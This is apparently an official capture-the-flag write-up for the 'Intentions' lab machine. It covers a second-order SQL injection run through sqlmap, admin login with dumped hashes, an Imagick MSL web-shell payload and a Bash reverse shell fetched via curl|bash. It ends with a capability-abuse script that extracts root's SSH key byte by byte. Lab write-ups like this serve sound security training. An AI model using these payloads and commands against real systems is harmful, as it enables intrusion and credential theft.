Intentions
Difficulty: Hard
Classification: Official
Synopsis
Intentions is a hard Linux machine that starts off with an image gallery website which is prone to a
second-order SQL injection leading to the discovery of BCrypt hashes. Further enumeration
reveals a v2 API endpoint that allows authentication via hashes instead of passwords, leading to
admin access to the site. Within the admin panel the attacker will find a page that allows them to
edit the images within the gallery with the help of Imagick . The attacker is able to exploit the
Imagick object instantiation and gain code execution. Once the attacker has a shell as www-data
they will need to examine the Git history for the current project, where they will find credentials
for the user greg . Once logged in as greg the user will enumerate and find that they have access
to the /opt/scanner/scanner binary with extended capabilities, specifically
CAP_DAC_READ_SEARCH . This capability allows the attacker to exfiltrate sensitive files such as the
private SSH key of the root user, byte-by-byte. With the key the attacker is able to authenticate
through SSH as the root user.
Skills Required
Web enumeration
Skills Learned
Leveraging Arbitrary Object Instantiations via Imagick
Vulnerability Research
Scripting exploits
Enumeration
Nmap
ports=$(nmap -p- --min-rate=1000 -T4 10.129.83.115 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 10.129.83.115
The Nmap output reveals two open ports. On port 22 an SSH server is running, and on port 80
an Nginx web server. Since we don't currently have any valid SSH credentials we should begin our
enumeration by visiting port 80 .
Before we begin our enumeration process, we modify our /etc/hosts file to include
intentions.htb , so that we don't have to type the IP of the machine every time.
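The appended entry, using the target IP from our scan, looks like this:

```
10.129.83.115 intentions.htb
```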
Nginx - Port 80
Upon visiting http://intentions.htb we observe a Login and a Registration page.
Before we register a new account, we attempt to discover directories using gobuster :
<SNIP>
===============================================================
2023/02/03 01:58:36 Starting gobuster in directory enumeration mode
===============================================================
http://intentions.htb/admin       (Status: 302) [Size: 330] [--> http://intentions.htb]
http://intentions.htb/css         (Status: 301) [Size: 178] [--> http://intentions.htb/css/]
http://intentions.htb/favicon.ico (Status: 200) [Size: 0]
http://intentions.htb/fonts       (Status: 301) [Size: 178] [--> http://intentions.htb/fonts/]
http://intentions.htb/gallery     (Status: 302) [Size: 330] [--> http://intentions.htb]
http://intentions.htb/js          (Status: 301) [Size: 178] [--> http://intentions.htb/js/]
http://intentions.htb/robots.txt  (Status: 200) [Size: 24]
http://intentions.htb/storage     (Status: 301) [Size: 178] [--> http://intentions.htb/storage/]
Here we spot a few interesting entries, specifically an /admin page of some sort, a /gallery page, and a /storage directory.
The gallery and feed options will show us some images as well as the genre they are associated
with:
On our profile we can see there is a new Favorite Genres feature with the default options of
food,travel,nature . Based on the context provided, we can infer that the API that powers the
feed page is leveraging this profile setting to display relevant content.
Given that this is one of the only places in the web application where we can supply some input to
be processed by the backend or API, we will continue our enumeration here and look for possible
injections or other suspicious responses and behaviour.
At this point, we can use ZAP (or another Web proxy, such as BurpSuite ) to intercept the
requests made by the Gallery application to the API. The requests of interest are:
Our goal now is to pass these requests to sqlmap , so we need to save the contents of each of
these requests into a file. We will save our POST request to /user/genres as
updateGenresRequest and it should look something like this:
{"genres":"food"}
We also save our GET request to /user/feed to fetchFeedRequest and it should look
something like this:
We now evaluate these requests for possible SQL injection vulnerabilities using SQLMap .
Update Genres
This also yields no results. However, we know for a fact that the Favorite Genres options directly
affect our feed, so it's worth exploring our options a bit more in this scenario. SQLMap suggests
that we may want to try a tamper script:
If we manually interact with the update genres endpoint, we can observe that a request
containing spaces, such as nature, animals, test , will become nature,animals,test the next
time we visit the page, indicating that spaces are being actively stripped.
Let's try our second-order SQLi check with a tamper script to change spaces:
sqlmap -r updateGenresRequest --second-req=fetchFeedRequest --batch --tamper=space2comment
Note: Sometimes this may only identify a time-based SQL injection, at which point we can
optionally extend our check by specifying --dbms=MySQL --level=5
<SNIP>
---
Parameter: JSON genres ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: {"genres":"food') AND 4617=4617 AND ('CImT'='CImT"}
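For context, the space2comment tamper works by rewriting each space in the injected payload as an inline MySQL comment, which is still valid SQL but survives the application's space-stripping. A minimal sketch of the transformation:

```python
# Sketch of what sqlmap's space2comment tamper does to a payload:
# each space becomes an inline MySQL comment, so the backend's
# space-stripping no longer breaks the injection.
def space2comment(payload: str) -> str:
    return payload.replace(" ", "/**/")

print(space2comment("food') AND 4617=4617 AND ('CImT'='CImT"))
# → food')/**/AND/**/4617=4617/**/AND/**/('CImT'='CImT
```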
Now we can easily enumerate the target's database. First of all, we have to enumerate the
available tables using the --tables flag:
Database: intentions
[4 tables]
+---------------------------------------+
| gallery_images |
| migrations |
| personal_access_tokens |
| users |
+---------------------------------------+
Then, we can extract data from the users table using -T users and --dump :
During our browsing we notice that all requests are going through /api/v1/... . We can
manually play around with the version and check if v2 endpoints are also available.
<SNIP>
http://intentions.htb/api/v2/auth/login (Status: 405) [Size: 825]
http://intentions.htb/api/v2/auth/logout (Status: 405) [Size: 825]
http://intentions.htb/api/v2/auth/refresh (Status: 500) [Size: 6615]
http://intentions.htb/api/v2/auth/register (Status: 405) [Size: 825]
http://intentions.htb/api/v2/auth/user (Status: 302) [Size: 330]
[--> http://intentions.htb]
We know that the 405 code is returned when we attempt an invalid request method. This can be
verified by visiting the v2 login page directly.
The new feature here is that the original v1 endpoint accepted an email and a password
parameter, while the new v2 endpoint accepts an email and a hash . We can verify this by
performing the same request against the v1 endpoint:
During the SQL injection step, we recovered the uncrackable password hashes of two
administrator users. If the v2 API is indeed in use, we have a way to access the Gallery application
as an Administrator without cracking the hashes.
We can test our theory by trying to authenticate as one of the administrators using their hash:
curl -d '[email protected]&hash=$2y$10$M/g27T1kJcOpYOfPqQlI3.YfdLIwr3EWbzWOLfpoTtjpeMqpp4twa' -X POST http://intentions.htb/api/v2/auth/login
{"status":"success","name":"steve"}
Indeed, it seems that we can authenticate using hashes over v2 . The easiest way to proceed is to
navigate to the login page, turn on request interception in our proxy and attempt to login with the
email [email protected] and the password
$2y$10$M/g27T1kJcOpYOfPqQlI3.YfdLIwr3EWbzWOLfpoTtjpeMqpp4twa .
When we intercept the request in our proxy, we change the URL to /api/v2... and the
password parameter to hash . It should look similar to the following:
We authenticate successfully and can now explore the admin panel, to which we must manually
navigate.
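If we prefer to script the v2 login rather than intercept it in a proxy, it is worth noting that a BCrypt hash contains characters ( $ , / ) that must be form-encoded. A minimal sketch, where the email is a hypothetical placeholder (the real address comes from the dumped users table):

```python
from urllib.parse import urlencode

# Build the v2 login body: the field is `hash` instead of v1's `password`.
# The email below is a placeholder; the real one comes from the users dump.
body = urlencode({
    "email": "admin@example",  # hypothetical placeholder
    "hash": "$2y$10$M/g27T1kJcOpYOfPqQlI3.YfdLIwr3EWbzWOLfpoTtjpeMqpp4twa",
})
print(body)  # note that $ and / arrive percent-encoded
```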
On there we see a news page which provides us with some interesting details. Apart from the legal
notice, we see some news regarding the v2 API. We already know about the password/hash
change but we also get a reference link to imagick , which is allegedly used to apply effects on the
images.
Moreover, there is a Users page that displays some basic information about the currently
registered users, but provides no additional functionality:
Upon navigating to the Images tab of the admin panel, we are presented with a list of the current
images, their genre, public URL, and a link to an Edit page.
Within this request we can see the following data being sent:
{"path":"/var/www/html/intentions/storage/app/public/animals/jevgeni-fil-rz2Nh0U8vws-unsplash.jpg","effect":"swirl"}
Here, we can specify the absolute path to the file, as well as a string denoting the effect to apply.
We can attempt to mess with these parameters, such as pointing the path to the /etc/passwd
file:
{"path":"/etc/passwd","effect":"swirl"}
However, the API responds with a 422 status stating we have provided a bad image path.
Foothold
Let's review what we know so far about the web application.
We have an endpoint that's likely feeding a file path into an Imagick constructor
We know a full path on the system that results in publicly available files
Looking around the web on how to exploit Imagick constructors we come across this article,
which outlines how to exploit PHP's built-in classes via arbitrary object instantiation to achieve
RCE.
Since the exploit relies on a Remote File Inclusion (RFI), we first check our theory by starting up a
Python webserver and submitting a payload whose path points to our machine:
python3 -m http.server 80
{"path":"http://10.10.14.40/test","effect":"wave"}
This likely means that the target can be exploited in the way described in the aforementioned
article. We therefore start off using a modified version of the PoC provided in the article and save
it in a file called payload.msl :
As stated in the article, we use the caption: and info: schemes to try and obtain a web shell.
We also set the write path to the publicly-accessible directory on the target that we discovered
earlier.
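Based on the PoC from the article and the storage path observed earlier, payload.msl plausibly looks like the following (the rce.php filename and the exact payload are our own choices, adapted from the article):

```xml
<?xml version="1.0" encoding="UTF-8"?>
<image>
 <!-- caption: renders the PHP one-liner as image content without touching disk -->
 <read filename="caption:&lt;?php system($_GET['c']); ?&gt;" />
 <!-- info: writes it back out as text, dropping our web shell in the public dir -->
 <write filename="info:/var/www/html/intentions/storage/app/public/rce.php" />
</image>
```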
Next, we need a way to send this file as a multipart form. The easiest way to do this is to open the
Developers Console in our browser, navigate to the Network tab, click one of the image effect
buttons, then right click the POST request to /modify and copy it as a cURL command.
-F 'path=vid:msl:/tmp/php*'
The full explanation lies in the article above, but this allows us to essentially target the available
PHP temporary files and include our MSL file that we are going to upload, without knowing its
exact name.
-F 'effect=asd'
The endpoint requires an effect parameter, but its contents don't matter.
Upon running the cURL command, we may see a 502 gateway error or an empty response. To
validate our success we can navigate to the following URL:
http://intentions.htb/storage/rce.php
We can attempt to run commands, such as listing the files in the current directory, with the
following request:
http://intentions.htb/storage/rce.php?c=ls
This verifies that our payload ran successfully, and we can now execute arbitrary commands on
the target machine.
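Since commands are passed via the c query parameter, spaces and other shell metacharacters must be percent-encoded to survive the URL. A small helper illustrates this (the webshell_url function is our own):

```python
from urllib.parse import quote

# Hypothetical helper: percent-encode a shell command so it survives
# the query string of the rce.php web shell.
def webshell_url(cmd: str) -> str:
    return "http://intentions.htb/storage/rce.php?c=" + quote(cmd, safe="")

print(webshell_url("ls -al /var/www"))
# → http://intentions.htb/storage/rce.php?c=ls%20-al%20%2Fvar%2Fwww
```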
To obtain a reverse shell we create a file called shell on our local machine, containing a Bash
reverse shell one-liner (e.g. bash -i >& /dev/tcp/10.10.14.40/9001 0>&1 , using our own IP),
serve it with our Python web server, and start a listener:
nc -nlvp 9001
Finally, we run a cURL command on the web shell and pipe it to bash to land us a shell.
http://intentions.htb/storage/rce.php?c=curl%2010.10.14.40/shell|bash
nc -nlvp 9001
Lateral Movement
At this point, as www-data , we can run the usual enumeration commands, but we don't find
anything interesting. Looking at the root folder of the Intentions web application, however, we
spot a .git folder.
www-data@intentions:/var/www/html/intentions$ ls -al
total 820
drwxr-xr-x 14 root root 4096 Feb 2 2023 .
drwxr-xr-x 3 root root 4096 Feb 2 2023 ..
drwxr-xr-x 7 root root 4096 Apr 12 2022 app
-rwxr-xr-x 1 root root 1686 Apr 12 2022 artisan
<SNIP>
-rw-r--r-- 1 root root 1068 Feb 2 2023 .env
drwxr-xr-x 8 root root 4096 Feb 3 2023 .git
<SNIP>
Let's examine previous versions of the project by using the git log -p command.
Unfortunately, we are informed that we cannot run the log command as the .git folder is owned
by root .
If we try to rectify this through the suggested command, we get a permission error:
git config --global --add safe.directory /var/www/html/intentions
We will find that our lack of write access in /var/www causes us some issues.
Reading the Git documentation, we find that Git looks for its global configuration file in the user's
$HOME directory. We can easily get around our lack of write access in /var/www by overriding
our $HOME environment variable.
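The workaround can be sketched as follows, pointing $HOME at a world-writable directory so that the safe.directory entry lands in /tmp/.gitconfig :

```shell
# Git reads its global config from $HOME/.gitconfig, so a writable HOME
# lets us add the safe.directory entry without write access to /var/www.
export HOME=/tmp
git config --global --add safe.directory /var/www/html/intentions
# Confirm the entry landed in /tmp/.gitconfig:
git config --global --get-all safe.directory
```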
Now, we are able to read through the logs and spot a password for the user greg :
commit f7c903a54cacc4b8f27e00dbf5b0eae4c16c3bb4
Author: greg <[email protected]>
Date: Thu Jan 26 09:21:52 2023 +0100
Test cases did not work on steve's local database, switching to user factory
per his advice
greg@intentions:~$ id
uid=1001(greg) gid=1001(greg) groups=1001(greg),1003(scanner)
We notice that greg is part of the scanner group. The user flag can be found in
/home/greg/user.txt .
Privilege Escalation
Once authenticated as the user greg we can find some interesting files in his home directory:
dmca_check.sh and dmca_hashes.test .
greg@intentions:~$ ls -al
total 52
drwxr-x--- 4 greg greg 4096 Jun 19 13:09 .
drwxr-xr-x 5 root root 4096 Jun 10 14:56 ..
<SNIP>
-rwxr-x--- 1 root greg 75 Jun 10 17:33 dmca_check.sh
-rwxr----- 1 root greg 11044 Jun 10 15:31 dmca_hashes.test
<SNIP>
Looking into dmca_check.sh we can see that it executes the following command:
Interestingly enough, greg does not have access to actually inspect the specified file:
greg@intentions:~$ ls /home/legal/uploads/
This should be our first indication that something unusual is occurring in terms of access control
in this binary. Checking the binary itself, we can see it is not a setuid binary, and we are not
executing it with sudo :
The only way that's left for the binary to have read access to a file that we don't have is through
capabilities. Indeed, if we check the binary with getcap we can see that it has the
cap_dac_read_search capability.
/opt/scanner/scanner cap_dac_read_search=ep
Let's find out if we can exploit the functionality of the scanner binary to our advantage; executing
the scanner binary with no arguments provides us with some useful information:
greg@intentions:~$ /opt/scanner/scanner
Expected output:
1. Empty if no matches found
2. A line for every match, example:
[+] {LABEL} matches {FILE}
-c string
Path to image file to check. Cannot be combined with -d
-d string
Path to image directory to check. Cannot be combined with -c
-h string
Path to colon separated hash file. Not compatible with -p
-l int
Maximum bytes of files being checked to hash. Files smaller than this
value will be fully hashed. Smaller values are much faster but prone to false
positives. (default 500)
-p [Debug] Print calculated file hash. Only compatible with -c
-s string
Specific hash to check against. Not compatible with -h
As an image gallery, the site is concerned with hosting copyrighted material, and its developers
have built a utility to check file contents against a known blacklist of copyrighted files. There is
also a reference suggesting that this utility could be dual-purposed to avoid adding duplicate
images to the gallery as it grows in size.
To evaluate matches, the binary generates an MD5 hash of each file's contents and compares it
against a user-provided blacklist. Reading the dmca_hashes.test file, we can see a potential
blacklist used by the gallery:
DMCA-#5133:218a61dfdebf15292a94c8efdd95ee3c
DMCA-#4034:a5eff6a2f4a3368707af82d3d8f665dc
DMCA-#7873:7b2ad34b92b4e1cb73365fe76302e6bd
DMCA-#2901:052c4bb8400a5dc6d40bea32dfcb70ed
DMCA-#9112:0def227f2cdf0bb3c44809470f28efb6
DMCA-#9564:b58b5d64a979327c6068d447365d2593
<SNIP>
The blacklist file contains a {LABEL}:{MD5} entry on each line. As observed from the
dmca_check.sh script, upon finding a match the program will inform us what label triggered the
hit, and which file it considers a match. The program also allows us to check a specific file with the
-c flag, or an entire directory with the -d flag.
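A blacklist entry is therefore just a label joined to an MD5 digest by a colon; a small helper (our own, for illustration) that produces such an entry for arbitrary content:

```python
import hashlib

# Produce one {LABEL}:{MD5} blacklist entry for the scanner binary;
# the label is free-form and only echoed back on a match.
def blacklist_line(label: str, content: bytes) -> str:
    return f"{label}:{hashlib.md5(content).hexdigest()}"

print(blacklist_line("DMCA-#0001", b"hello"))
# → DMCA-#0001:5d41402abc4b2a76b9719d911017c592
```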
At first glance this doesn't seem very helpful - we would need to know the contents of a sensitive
file to check whether it matches. However, digging deeper into the help text, we observe that the
user can control how many bytes of each file get checked via the -l flag. By default the program
hashes only the first 500 bytes; the developers made this length configurable so that checks
remain fast as more images come into play.
Since MD5 hashing is a relatively fast procedure, we can leverage the -l flag and essentially
brute-force sensitive files byte-by-byte. We can craft a Python script that generates a "blacklist"
containing all printable characters and asks the scanner binary to check only the first byte of a
sensitive file. When the scanner reports a match, we know the first byte of the file; at that point,
we create a new "blacklist" consisting of the recovered prefix plus each printable character, and
ask the scanner to match the first two bytes. The cycle continues until the end of the file.
For the purposes of this writeup, the final script looks as follows:
import string
import hashlib
import subprocess

base = ""        # recovered file prefix so far
hasResult = True
hashMap = {}     # MD5 digest -> candidate prefix
readFile = "/root/.ssh/id_rsa"

def checkMatch():
    global base
    # Ask the scanner to hash only the first len(base) + 1 bytes of the target
    result = subprocess.Popen(
        ["/opt/scanner/scanner", "-c", readFile,
         "-h", "./hash.log", "-l", str(len(base) + 1)],
        stdout=subprocess.PIPE)
    for line in result.stdout:
        line = str(line)
        if "[+]" in line:
            # Output format: [+] {LABEL} matches {FILE}; our label is the MD5 itself
            check = line.split(" ")
            if len(check) == 4 and check[1] in hashMap:
                base = hashMap[check[1]]
                return True
    return False

def writeFile(base):
    # Write a "blacklist" with one entry per printable character, using the
    # hash itself as the label so a hit maps straight back to its prefix
    f = open("hash.log", "w")
    hashMap.clear()
    for character in string.printable:
        check = base + character
        md5 = hashlib.md5(check.encode()).hexdigest()
        hashMap[md5] = check
        f.write(md5 + ":" + md5 + "\n")
    f.close()

while hasResult:
    writeFile(base)
    hasResult = checkMatch()
    print("Found")
    print(base)

print("Done")
The above script takes care of generating the hash "blacklist", executing the scanner binary with
the appropriate arguments, and extracting the target file - in this case, the root user's private
SSH key:
Found
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEA5yMuiPaWPr6P0GYiUi5EnqD8QOM9B7gm2lTHwlA7FMw95/wy8JW3
HqEMYrWSNpX2HqbvxnhOBCW/uwKMbFb4LPI+EzR6eHr5vG438EoeGmLFBvhge54WkTvQyd
<SNIP>
D7F0nauYkSG+eLwFAd9K/kcdxTuUlwvmPvQiNg70Z142bt1tKN8b3WbttB3sGq39jder8p
nhPKs4TzMzb0gvZGGVZyjqX68coFz3k1nAb5hRS5Q+P6y/XxmdBB4TEHqSQtQ4PoqDj2IP
DVJTokldQ0d4ghAAAAD3Jvb3RAaW50ZW50aW9ucwECAw==
-----END OPENSSH PRIVATE KEY-----
Done
We write the private key to a file called root_key , then apply the correct permissions to the file
and authenticate as root on the remote machine.
chmod 600 root_key
ssh -i root_key [email protected]
root@intentions:~# id
uid=0(root) gid=0(root) groups=0(root)